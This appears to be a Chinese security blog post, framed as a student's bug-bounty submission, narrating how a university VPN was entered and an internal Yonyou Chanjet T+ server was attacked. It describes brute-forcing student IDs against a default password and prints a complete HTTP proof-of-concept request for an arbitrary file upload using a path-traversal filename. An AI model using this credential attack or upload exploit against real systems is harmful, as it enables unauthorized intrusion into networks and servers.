No.0
前言
在当今企业环境中,远程工作已成为一种常态,VPN技术提供了一种安全便捷的方式,让员工能够从世界任何角落访问公司的内部网络。然而,正如VPN为合法用户打开了远程工作的大门,它也可能为网络安全防线引入了新的漏洞。一旦VPN配置不当或存在其他安全漏洞,黑客就能利用这一点进入局域网(LAN),接着进行深入的渗透测试
No.1
入口点查找
先是通过信息收集获取到该校的VPN账号、密码和软件
如下是校园网的接入指南。发现存在初始密码
读完后在下方发现vpn的下载链接
进一步收集vpn的相关信息
发现是通过校园网账号登录的
因为大多数高校学号固定等长且连续,因此尝试固定密码爆破学号获取到vpn账号(ps:其实我感觉可以直接去校园墙py一波)
成功接入VPN
No.2
漏洞查找
进一步收集资产
点击进入发现是用友畅捷通的系统
利用之前爆出的漏洞(用友畅捷通T+ <= 17.x)
存在任意文件上传的漏洞,甩poc尝试
Poc:
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: http://xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 188
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, / ;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysHT4cEvOAWALSZEv
Origin: null
Upgrade-Insecure-Requests: 1
------WebKitFormBoundarysHT4cEvOAWALSZEv
Content-Disposition: form-data; name="File1"; filename="../aaaa.txt"
Content-Type: image/jpeg
aaaa
------WebKitFormBoundarysHT4cEvOAWALSZEv--
查看返回包发现成功上传
直接访问上传的文件
好的,点到为止高危到手
Src学员投稿
No.3
网安沟通交流群
扫码加客服小姐姐拉群
原文始发于微信公众号(隐雾安全):你能拿到她的VPN,但永远拿不了她的shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论